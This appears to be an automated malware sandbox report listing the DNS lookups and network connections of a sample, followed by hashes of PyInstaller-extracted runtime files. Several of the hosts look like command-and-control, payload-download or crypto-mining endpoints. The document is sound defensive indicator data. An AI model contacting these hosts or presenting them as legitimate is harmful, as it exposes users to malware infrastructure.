US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 6.113.202.185.in-addr.arpa udp
US 8.8.8.8:53 ftp.ywxww.net udp
US 98.109.126.66:41798 98.109.126.66 tcp
CN 211.149.230.178:80 hseda.com tcp
US 8.8.8.8:53 a12xxx1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 post-to-me.com udp
US 104.21.56.70:443 post-to-me.com tcp
US 8.8.8.8:53 66.126.109.98.in-addr.arpa udp
US 8.8.8.8:53 70.56.21.104.in-addr.arpa udp
US 8.8.8.8:53 panpoppo-25611.portmap.io udp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
DE 94.130.210.71:443 gladim.sbs tcp
DE 94.130.210.71:443 gladim.sbs tcp
HK 118.107.47.206:2088 118.107.47.206 tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
US 8.8.8.8:53 cs.go.kg udp
CN 116.169.183.183:80 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
CN 180.163.141.182:80 tcp
DE 94.130.210.71:443 gladim.sbs tcp
KR 211.168.94.177:3389 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 206.47.107.118.in-addr.arpa udp
CN 111.6.201.155:80 download.caihong.com tcp
US 8.8.8.8:53 cd.textfiles.com udp
US 8.8.8.8:53 2.haory.cn udp
US 8.8.8.8:53 rddissisifigifidi.net udp
US 8.8.8.8:53 www.teknoarge.com udp
US 8.8.8.8:53 www.blackhattoolz.com udp
US 8.8.8.8:53 loeghaiofiehfihf.to udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
HK 47.79.66.205:443 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
US 8.8.8.8:53 dcwblida.dz udp
US 8.8.8.8:53 funletters.net udp
US 8.8.8.8:53 download.skycn.com udp
US 8.8.8.8:53 down.mvip8.ru udp
US 8.8.8.8:53 cfs10.blog.daum.net udp
US 8.8.8.8:53 xss-1253555722.cos.ap-singapore.myqcloud.com udp
US 8.8.8.8:53 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link udp
US 8.8.8.8:53 epei77.direct.quickconnect.to udp
US 8.8.8.8:53 dow.andylab.cn udp
US 66.63.187.231:80 66.63.187.231 tcp
FR 82.127.74.198:5000 82.127.74.198 tcp
CN 36.110.15.211:9000 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
RU 92.127.156.174:8880 92.127.156.174 tcp
IN 122.179.136.112:80 122.179.136.112 tcp
US 24.93.22.147:8081 24.93.22.147 tcp
HK 134.122.129.19:80 134.122.129.19 tcp
CN 47.104.233.213:14319 tcp
CN 49.234.48.162:80 tcp
US 23.122.210.174:80 23.122.210.174 tcp
KR 218.147.147.172:80 epei77.direct.quickconnect.to tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
CN 139.198.15.223:8080 tcp
CN 114.55.106.136:80 tcp
NL 185.208.158.96:80 185.208.158.96 tcp
CN 47.104.173.216:8082 tcp
CN 119.167.70.110:13332 tcp
SE 185.130.45.176:80 185.130.45.176 tcp
KR 211.220.36.213:80 211.220.36.213 tcp
IL 81.218.175.244:80 81.218.175.244 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 antivirus-helper.publicvm.com udp
US 8.8.8.8:53 205.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 198.74.127.82.in-addr.arpa udp
US 8.8.8.8:53 96.158.208.185.in-addr.arpa udp
US 8.8.8.8:53 176.45.130.185.in-addr.arpa udp
US 8.8.8.8:53 244.175.218.81.in-addr.arpa udp
US 8.8.8.8:53 174.156.127.92.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 147.22.93.24.in-addr.arpa udp
US 8.8.8.8:53 112.136.179.122.in-addr.arpa udp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
US 8.8.8.8:53 19.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 213.36.220.211.in-addr.arpa udp
US 8.8.8.8:53 172.147.147.218.in-addr.arpa udp
US 8.8.8.8:53 11.82.12.154.in-addr.arpa udp
US 8.8.8.8:53 174.210.122.23.in-addr.arpa udp
ES 31.214.180.12:81 31.214.180.12 tcp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
CN 113.106.6.106:14319 tcp
KR 125.186.91.61:80 125.186.91.61 tcp
HK 134.122.129.20:80 134.122.129.20 tcp
KG 176.126.167.7:80 cs.go.kg tcp
AU 110.143.54.213:80 110.143.54.213 tcp
FR 80.11.228.144:10140 80.11.228.144 tcp
RU 176.111.174.140:443 tcp
IN 43.240.65.55:81 43.240.65.55 tcp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
US 172.67.72.30:443 www.blackhattoolz.com tcp
TR 31.145.124.122:80 www.teknoarge.com tcp
US 208.86.224.90:80 cd.textfiles.com tcp
CN 58.16.114.29:8988 2.haory.cn tcp
DZ 41.111.143.136:443 dcwblida.dz tcp
US 172.67.130.102:80 down.mvip8.ru tcp
US 208.122.221.162:80 funletters.net tcp
US 209.94.90.3:443 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link tcp
KR 218.147.147.172:80 epei77.direct.quickconnect.to tcp
LU 107.189.5.6:80 107.189.5.6 tcp
US 23.241.17.95:80 23.241.17.95 tcp
KR 211.231.99.68:80 cfs10.blog.daum.net tcp
CN 116.131.57.65:80 dow.andylab.cn tcp
SG 43.153.232.151:80 xss-1253555722.cos.ap-singapore.myqcloud.com tcp
US 8.8.8.8:53 a18qqq1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 83-87-76-41.cable.dynamic.v4.ziggo.nl udp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
US 8.8.8.8:53 12.180.214.31.in-addr.arpa udp
US 8.8.8.8:53 30.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 102.130.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.90.94.209.in-addr.arpa udp
US 8.8.8.8:53 6.5.189.107.in-addr.arpa udp
US 8.8.8.8:53 144.228.11.80.in-addr.arpa udp
US 8.8.8.8:53 136.143.111.41.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 140.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 122.124.145.31.in-addr.arpa udp
US 8.8.8.8:53 90.224.86.208.in-addr.arpa udp
US 8.8.8.8:53 7.167.126.176.in-addr.arpa udp
US 8.8.8.8:53 162.221.122.208.in-addr.arpa udp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 8.8.8.8:53 95.17.241.23.in-addr.arpa udp
US 8.8.8.8:53 20.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 151.232.153.43.in-addr.arpa udp
US 8.8.8.8:53 68.99.231.211.in-addr.arpa udp
US 8.8.8.8:53 213.54.143.110.in-addr.arpa udp
DE 136.243.111.71:741 antivirus-helper.publicvm.com tcp
US 8.8.8.8:53 jtpdev.co.uk udp
US 8.8.8.8:53 c3poolbat.oss-accelerate.aliyuncs.com udp
DE 136.243.104.235:443 tcp
CN 116.114.98.35:80 download.skycn.com tcp
NL 83.87.76.41:80 83-87-76-41.cable.dynamic.v4.ziggo.nl tcp
HK 47.79.66.208:80 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
US 8.8.8.8:53 klfs.synology.me udp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 8.8.8.8:53 71.111.243.136.in-addr.arpa udp
GB 91.238.160.241:443 jtpdev.co.uk tcp
US 8.8.8.8:53 down.qqfarmer.com.cn udp
US 8.8.8.8:53 360down7.miiyun.cn udp
US 8.8.8.8:53 208.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 190.217.204.203.in-addr.arpa udp
US 8.8.8.8:53 241.160.238.91.in-addr.arpa udp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
US 8.8.8.8:53 5-157-110-232.dyn.eolo.it udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 172.41.208.8.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 41.76.87.83.in-addr.arpa udp
VN 103.110.33.188:80 103.110.33.188 tcp
US 8.8.8.8:53 adf6.adf6.com udp
DE 188.245.87.202:443 tcp
RU 176.113.115.37:80 176.113.115.37 tcp
CN 120.41.21.100:9096 klfs.synology.me tcp
US 66.63.187.231:80 66.63.187.231 tcp
CN 60.22.23.50:9898 tcp
CN 180.163.146.106:80 down.qqfarmer.com.cn tcp
US 8.8.8.8:53 mininews.kpzip.com udp
US 8.8.8.8:53 pouya.blob.core.windows.net udp
CN 218.12.76.158:80 360down7.miiyun.cn tcp
US 166.166.188.230:80 166.166.188.230 tcp
IT 5.157.110.232:80 5-157-110-232.dyn.eolo.it tcp
CN 8.134.12.90:80 tcp
CN 150.158.25.244:9000 tcp
CN 101.133.156.69:7777 tcp
US 166.167.172.14:8007 166.167.172.14 tcp
CN 120.77.253.240:80 tcp
BE 213.118.248.162:80 213.118.248.162 tcp
CN 101.71.255.146:8195 tcp
US 104.21.67.89:80 adf6.adf6.com tcp
CN 60.191.208.187:820 ftp.ywxww.net tcp
US 8.8.8.8:53 karoonpc.com udp
US 8.8.8.8:53 www.bkzj.wang udp
US 8.8.8.8:53 232.110.157.5.in-addr.arpa udp
US 8.8.8.8:53 89.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 162.248.118.213.in-addr.arpa udp
US 8.8.8.8:53 14.172.167.166.in-addr.arpa udp
CN 112.124.28.233:5566 tcp
ES 178.156.109.69:81 178.156.109.69 tcp
US 8.8.8.8:53 softdl.360tpcdn.com udp
US 8.8.8.8:53 cat.xiaojiji.nl udp
FR 20.209.8.43:443 pouya.blob.core.windows.net tcp
CL 190.215.253.57:80 190.215.253.57 tcp
CN 218.60.56.203:80 mininews.kpzip.com tcp
RU 176.111.174.140:80 176.111.174.140 tcp
IR 217.172.98.87:80 karoonpc.com tcp
HK 47.243.125.164:80 www.bkzj.wang tcp
US 8.8.8.8:53 69.109.156.178.in-addr.arpa udp
RU 89.175.24.90:8080 89.175.24.90 tcp
RU 95.163.152.69:9439 95.163.152.69 tcp
PH 154.39.138.52:80 cat.xiaojiji.nl tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.192.108.20:80 softdl.360tpcdn.com tcp
SG 158.140.133.56:8090 158.140.133.56 tcp
CN 117.50.95.62:9880 tcp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 43.8.209.20.in-addr.arpa udp
US 8.8.8.8:53 87.98.172.217.in-addr.arpa udp
US 8.8.8.8:53 57.253.215.190.in-addr.arpa udp
US 8.8.8.8:53 69.152.163.95.in-addr.arpa udp
US 8.8.8.8:53 164.125.243.47.in-addr.arpa udp
US 8.8.8.8:53 90.24.175.89.in-addr.arpa udp
US 8.8.8.8:53 52.138.39.154.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
DE 94.130.210.71:443 gladim.sbs tcp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 56.133.140.158.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 aaaa.qqqmy.com udp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
US 8.8.8.8:53 ad.adf6.com udp
US 8.8.8.8:53 qqqmy.com udp
US 8.8.8.8:53 httpbin.org udp
US 192.74.234.120:80 ad.adf6.com tcp
US 18.208.8.205:443 httpbin.org tcp
RU 92.255.57.88:80 92.255.57.88 tcp
DE 94.130.210.71:443 gladim.sbs tcp
CN 139.159.155.204:88 tcp
HK 8.217.48.27:80 qqqmy.com tcp
US 8.8.8.8:53 205.8.208.18.in-addr.arpa udp
US 8.8.8.8:53 120.234.74.192.in-addr.arpa udp
US 8.8.8.8:53 88.57.255.92.in-addr.arpa udp
DE 94.130.210.71:443 gladim.sbs tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 home.fvtekx5pt.top udp
DE 34.159.64.221:80 home.fvtekx5pt.top tcp
TR 5.26.97.52:80 5.26.97.52 tcp
US 8.8.8.8:53 125.21.192.23.in-addr.arpa udp
US 8.8.8.8:53 221.64.159.34.in-addr.arpa udp
US 8.8.8.8:53 coindiscussion.net udp
VN 103.77.173.146:7707 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 cs.go.kg udp
KG 176.126.167.7:80 cs.go.kg tcp
KG 176.126.167.7:80 cs.go.kg tcp
CZ 77.240.97.71:81 77.240.97.71 tcp
CN 39.108.237.194:80 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 arpdabl.zapto.org udp
US 8.8.8.8:53 71.97.240.77.in-addr.arpa udp
DE 87.120.84.39:80 tcp
US 20.83.148.22:80 tcp
ES 178.60.25.240:80 178.60.25.240 tcp
DE 38.242.241.140:80 38.242.241.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 140.241.242.38.in-addr.arpa udp
US 8.8.8.8:53 240.25.60.178.in-addr.arpa udp
RU 176.111.174.140:80 176.111.174.140 tcp
HK 8.217.48.27:443 qqqmy.com tcp
DE 94.130.210.71:443 gladim.sbs tcp
HK 8.217.48.27:443 qqqmy.com tcp
CN 1.15.110.72:2022 tcp
US 8.8.8.8:53 sjlwql.top udp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
US 8.8.8.8:53 eveezueigohehla.co udp
US 8.8.8.8:53 ldcdn.ldmnq.com udp
US 144.34.162.13:80 fish.hackbiji.cc tcp
NL 216.252.233.8:80 coindiscussion.net tcp
RU 176.111.174.140:80 176.111.174.140 tcp
HK 8.217.48.27:80 qqqmy.com tcp
US 8.8.8.8:53 8.233.252.216.in-addr.arpa udp
VE 167.250.49.155:80 167.250.49.155 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 155.49.250.167.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
RU 176.111.174.140:80 176.111.174.140 tcp
KG 176.126.167.7:80 cs.go.kg tcp
DE 94.130.210.71:443 gladim.sbs tcp
HK 154.12.82.11:808 tcp
US 100.16.168.239:3216 100.16.168.239 tcp
CN 123.235.29.162:6713 tcp
DE 94.130.210.71:443 gladim.sbs tcp
TH 45.141.26.170:80 45.141.26.170 tcp
US 104.243.129.2:80 104.243.129.2 tcp
RU 185.215.113.66:80 eveezueigohehla.co tcp
GB 79.133.176.213:443 ldcdn.ldmnq.com tcp
HK 156.245.12.92:8000 156.245.12.92 tcp
US 170.55.7.234:80 170.55.7.234 tcp
DE 38.242.241.140:80 38.242.241.140 tcp
KG 176.126.167.7:80 cs.go.kg tcp
RU 176.111.174.140:1912 tcp
US 8.8.8.8:53 sjlwql.top udp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 239.168.16.100.in-addr.arpa udp
RU 185.215.113.66:80 eveezueigohehla.co tcp
CN 180.163.141.183:80 tcp
CN 123.6.37.172:80 tcp
US 8.8.8.8:53 ini.sh-pp.com udp
US 8.8.8.8:53 artemka.spb.ru udp
US 8.8.8.8:53 static-91-225-132-57.devs.futuro.pl udp
US 8.8.8.8:53 adv.gamer.kg udp
KG 176.126.167.7:80 adv.gamer.kg tcp
US 8.8.8.8:53 213.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 92.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 170.26.141.45.in-addr.arpa udp
US 8.8.8.8:53 234.7.55.170.in-addr.arpa udp
US 8.8.8.8:53 2.129.243.104.in-addr.arpa udp
KG 176.126.167.7:80 adv.gamer.kg tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
KG 176.126.167.7:80 adv.gamer.kg tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
HK 154.12.82.11:7878 tcp
DE 94.130.210.71:443 gladim.sbs tcp
CN 111.177.9.221:80 download.caihong.com tcp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
TR 31.145.124.122:443 www.teknoarge.com tcp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 pool.hashvault.pro udp
GB 142.250.200.3:80 c.pki.goog tcp
DE 95.179.241.203:80 pool.hashvault.pro tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 home.sevkk17sr.top udp
CN 119.167.229.212:80 dow.andylab.cn tcp
US 8.8.8.8:53 sjlwql.top udp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
GB 142.250.200.3:80 o.pki.goog tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 www.aqianniao.com udp
US 8.8.8.8:53 upload.vina-host.com udp
US 8.8.8.8:53 78-20-115-5.access.telenet.be udp
US 8.8.8.8:53 shell.dimitrimedia.com udp
US 8.8.8.8:53 update.itopvpn.com udp
US 8.8.8.8:53 23-122-210-174.lightspeed.cicril.sbcglobal.net udp
US 8.8.8.8:53 cfs5.tistory.com udp
US 8.8.8.8:53 file.edunet.ac udp
PL 91.225.132.57:80 static-91-225-132-57.devs.futuro.pl tcp
RU 178.130.39.138:80 artemka.spb.ru tcp
CN 47.101.28.200:80 ini.sh-pp.com tcp
IN 122.170.110.131:9105 122.170.110.131 tcp
CN 101.126.11.168:80 tcp
CN 113.106.6.106:14417 tcp
CN 47.120.46.210:80 tcp
KR 1.214.192.147:80 1.214.192.147 tcp
CN 8.137.59.132:8888 tcp
US 8.8.8.8:53 www.flechabusretiro.com.ar udp
IN 180.150.240.238:80 180.150.240.238 tcp
RU 176.113.115.215:80 176.113.115.215 tcp
CN 114.215.27.238:14417 tcp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
VN 125.212.220.95:443 upload.vina-host.com tcp
DE 172.105.66.118:80 shell.dimitrimedia.com tcp
DE 185.254.96.92:80 tcp
PL 152.199.23.214:80 update.itopvpn.com tcp
BE 78.20.115.5:80 78-20-115-5.access.telenet.be tcp
NL 194.122.165.149:80 tcp
KR 221.143.46.92:80 file.edunet.ac tcp
US 8.8.8.8:53 215.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 238.240.150.180.in-addr.arpa udp
US 8.8.8.8:53 118.66.105.172.in-addr.arpa udp
US 8.8.8.8:53 95.220.212.125.in-addr.arpa udp
US 8.8.8.8:53 92.46.143.221.in-addr.arpa udp
US 8.8.8.8:53 149.165.122.194.in-addr.arpa udp
US 8.8.8.8:53 138.39.130.178.in-addr.arpa udp
US 8.8.8.8:53 57.132.225.91.in-addr.arpa udp
JP 113.156.110.218:81 tcp
AR 200.105.67.246:80 www.flechabusretiro.com.ar tcp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 8.8.8.8:53 147.192.214.1.in-addr.arpa udp
US 8.8.8.8:53 214.23.199.152.in-addr.arpa udp
US 8.8.8.8:53 92.96.254.185.in-addr.arpa udp
US 8.8.8.8:53 5.115.20.78.in-addr.arpa udp
US 8.8.8.8:53 246.67.105.200.in-addr.arpa udp
US 8.8.8.8:53 218.110.156.113.in-addr.arpa udp
US 8.8.8.8:53 sjlwql.top udp
CN 180.163.146.108:80 down.qqfarmer.com.cn tcp
US 8.8.8.8:53 support.clz.kr udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 sjlwql.top udp
CN 1.15.110.72:2022 tcp
US 8.8.8.8:53 sjlwql.top udp
VN 103.77.173.146:7707 tcp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
CN 120.52.95.247:80 360down7.miiyun.cn tcp
US 20.83.148.22:80 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
US 8.8.8.8:53 sjlwql.top udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
CN 122.190.64.38:80 mininews.kpzip.com tcp
N/A 10.127.0.1:22 tcp
HK 43.132.12.146:9000 tcp
CN 113.219.142.35:80 www.aqianniao.com tcp
KR 121.53.218.30:80 cfs5.tistory.com tcp
US 8.8.8.8:53 www.xn--on3b15m2lco2u.com udp
US 8.8.8.8:53 home.fvtekx5pt.top udp
DE 34.159.64.221:80 home.fvtekx5pt.top tcp
US 8.8.8.8:53 sjlwql.top udp
US 8.8.8.8:53 30.218.53.121.in-addr.arpa udp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 sjlwql.top udp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
CN 1.15.110.72:2022 tcp
CN 180.163.141.180:80 tcp
CN 211.91.65.232:80 tcp
CN 123.6.72.99:80 download.caihong.com tcp
CN 14.205.47.78:80 dow.andylab.cn tcp
DE 94.156.177.41:80 94.156.177.41 tcp
US 8.8.8.8:53 sjlwql.top udp
US 8.8.8.8:53 41.177.156.94.in-addr.arpa udp
KR 203.232.37.151:80 tcp
TH 154.197.69.165:80 tcp
US 8.8.8.8:53 sjlwql.top udp
VN 103.77.173.146:6606 tcp
DE 193.161.193.99:25611 panpoppo-25611.portmap.io tcp
US 8.8.8.8:53 151.37.232.203.in-addr.arpa udp
US 8.8.8.8:53 165.69.197.154.in-addr.arpa udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 sjlwql.top udp
CN 1.15.110.72:2022 tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI44402\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\_MEI44402\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_lzma.pyd

MD5 337b0e65a856568778e25660f77bc80a
SHA1 4d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256 613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA512 19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_queue.pyd

MD5 ff8300999335c939fcce94f2e7f039c0
SHA1 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA256 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512 f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

C:\Users\Admin\AppData\Local\Temp\_MEI44402\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_ssl.pyd

MD5 069bccc9f31f57616e88c92650589bdd
SHA1 050fc5ccd92af4fbb3047be40202d062f9958e57
SHA256 cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32
SHA512 0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

C:\Users\Admin\AppData\Local\Temp\_MEI44402\pyexpat.pyd

MD5 1c0a578249b658f5dcd4b539eea9a329
SHA1 efe6fa11a09dedac8964735f87877ba477bec341
SHA256 d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509
SHA512 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI44402\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\_MEI44402\multidict\_multidict.cp311-win_amd64.pyd

MD5 ecc0b2fcda0485900f4b72b378fe4303
SHA1 40d9571b8927c44af39f9d2af8821f073520e65a
SHA256 bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1
SHA512 24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

C:\Users\Admin\AppData\Local\Temp\_MEI44402\propcache\_helpers_c.cp311-win_amd64.pyd

MD5 04444380b89fb22b57e6a72b3ae42048
SHA1 cfe9c662cb5ca1704e3f0763d02e0d59c5817d77
SHA256 d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4
SHA512 9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

C:\Users\Admin\AppData\Local\Temp\_MEI44402\_uuid.pyd

MD5 9a4957bdc2a783ed4ba681cba2c99c5c
SHA1 f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256 f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

C:\Users\Admin\AppData\Local\Temp\_MEI44402\yarl\_quoting_c.cp311-win_amd64.pyd

MD5 1c6c610e5e2547981a2f14f240accf20
SHA1 4a2438293d2f86761ef84cfdf99a6ca86604d0b8
SHA256 4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804
SHA512 f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

